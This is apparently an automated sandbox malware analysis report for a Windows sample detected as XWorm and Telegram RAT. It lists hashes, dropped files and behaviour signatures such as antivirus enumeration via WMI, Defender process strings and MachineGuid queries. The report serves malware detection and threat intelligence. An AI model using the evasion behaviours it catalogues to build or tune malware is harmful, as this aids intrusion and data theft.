Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067CA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1518076
Product:	CloudBasic
Start time:	11:30:08
Start date:	25.09.2024
Sample:	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a4cd1ff60c7b69df5a061df3365e60c7
SHA1:	e85cd869046c923938c1268c5eed9d30f0f94668
SHA256:	657b68666c2b79d65d51a403dd7fa0e35b1109156290efd69a681777eb6e4107
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VINQMAKI52OQ5DSR_ac49a6e8e43cdf6b966cd8165e24dd382453b1_3ff4ead9_b9b6324b-4ad3-4219-8fac-93424fd68963\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	0BB70F8C7BE268DFC77C90D10B4908D1	2B78331E35287F30A1280A649A9A511E450B9664	94529A6B3DB481F04C6FD0EBCDC17590A755A6FD1922D6CC232B3D5F92E4D8DB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A57.tmp.dmp	Mini DuMP crash report, 15 streams, Wed Sep 25 09:33:20 2024, 0x1205a4 type	4E7FF0032DDF37998487F38368449FFB	2DCEA72E35314B6B64C439E32ED0AEE148EAE4C1	0D110C6E2019C80A03AA81EF626052291FB1F80184136C4B0423D0E5EC780A76
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EDD.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	6D52D795DF7038F28C85309F3E9D4687	CD990976DF4FA312A85C258C9F5C2F6AEFFDF48A	2B28631682506907A5CAA4346C06B0A5024585B37A4B194FCB4121E02EDDA504
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F0C.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F5E3164DF46AD4B748AB657EAC6E5B0E	0B93EC341F70DA459EA17CF7576FCB3A4E2E05F9	A5D4E3F65E992F4030207B4028ADFAA83417C809E8D4BD0423D94468F1DD6AB6
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	E69342C07081A0B5758E395CA798BE5D	CE601F56F96A76C622AB2C000255A628B2C57E5B	5EDB0DFF728B1BF3A650145974EEF9CEB2C89EBF15146481496FA18636608FA8
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gxfn111.dfi.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_coqbk5j1.kuj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqvi3wjx.qt2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnojatvs.u4o.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	40182805E30594C1A47A833101A7F18E	9771FB84B5BE19A3FE458A469208A4C39494C56E	8BD735356C7E35A30ED2206635E9C8516FE8CA6D669DDFFE203BBADE4D24D76B

Windows Analysis Report SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Malware Threat Intel
Provided by